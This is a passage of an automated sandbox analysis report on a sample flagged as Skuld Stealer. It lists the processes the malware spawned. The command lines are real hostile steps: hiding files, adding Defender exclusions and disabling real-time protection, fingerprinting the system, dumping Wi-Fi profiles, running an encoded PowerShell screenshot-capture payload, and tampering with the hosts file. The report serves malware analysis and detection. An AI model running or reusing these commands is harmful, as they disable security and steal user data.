                                                                                                                                          • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:1
                                                                                                                                          Start time:05:40:44
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7b8370000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:05:40:44
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:attrib +h +s C:\Users\user\Desktop\skuld.exe
                                                                                                                                          Imagebase:0x7ff7f8ad0000
                                                                                                                                          File size:23'040 bytes
                                                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:05:40:44
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                                                                          Imagebase:0x7ff7f8ad0000
                                                                                                                                          File size:23'040 bytes
                                                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:05:40:46
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:wmic csproduct get UUID
                                                                                                                                          Imagebase:0x7ff7d80a0000
                                                                                                                                          File size:576'000 bytes
                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:05:40:47
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:wmic path win32_VideoController get name
                                                                                                                                          Imagebase:0x7ff7d80a0000
                                                                                                                                          File size:576'000 bytes
                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:05:40:48
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe
                                                                                                                                          Imagebase:0x7ff709200000
                                                                                                                                          File size:452'608 bytes
                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:7
                                                                                                                                          Start time:05:40:48
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:wmic os get Caption
                                                                                                                                          Imagebase:0x7ff7d80a0000
                                                                                                                                          File size:576'000 bytes
                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:8
                                                                                                                                          Start time:05:40:49
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:wmic cpu get Name
                                                                                                                                          Imagebase:0x7ff7d80a0000
                                                                                                                                          File size:576'000 bytes
                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:9
                                                                                                                                          Start time:05:40:50
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:wmic path win32_VideoController get name
                                                                                                                                          Imagebase:0x7ff7d80a0000
                                                                                                                                          File size:576'000 bytes
                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:11
                                                                                                                                          Start time:05:40:51
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:wmic csproduct get UUID
                                                                                                                                          Imagebase:0x7ff7d80a0000
                                                                                                                                          File size:576'000 bytes
                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:05:40:52
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:netsh wlan show profiles
                                                                                                                                          Imagebase:0x7ff657cb0000
                                                                                                                                          File size:96'768 bytes
                                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:13
                                                                                                                                          Start time:05:40:52
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                          Imagebase:0x7ff709200000
                                                                                                                                          File size:452'608 bytes
                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:15
                                                                                                                                          Start time:05:40:54
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                          Imagebase:0x7ff709200000
                                                                                                                                          File size:452'608 bytes
                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:16
                                                                                                                                          Start time:05:40:55
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline"
                                                                                                                                          Imagebase:0x7ff74c050000
                                                                                                                                          File size:2'759'232 bytes
                                                                                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:17
                                                                                                                                          Start time:05:40:55
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9F3.tmp" "c:\Users\user\AppData\Local\Temp\dh1o0wbe\CSC88D051478A0408BB4BF8545E397BDC4.TMP"
                                                                                                                                          Imagebase:0x7ff6bf170000
                                                                                                                                          File size:52'744 bytes
                                                                                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:18
                                                                                                                                          Start time:05:41:25
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                          Imagebase:0x7ff7f8ad0000
                                                                                                                                          File size:23'040 bytes
                                                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:19
                                                                                                                                          Start time:05:41:25
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                          Imagebase:0x7ff7f8ad0000
                                                                                                                                          File size:23'040 bytes
                                                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Disassembly

                                                                                                                                          No disassembly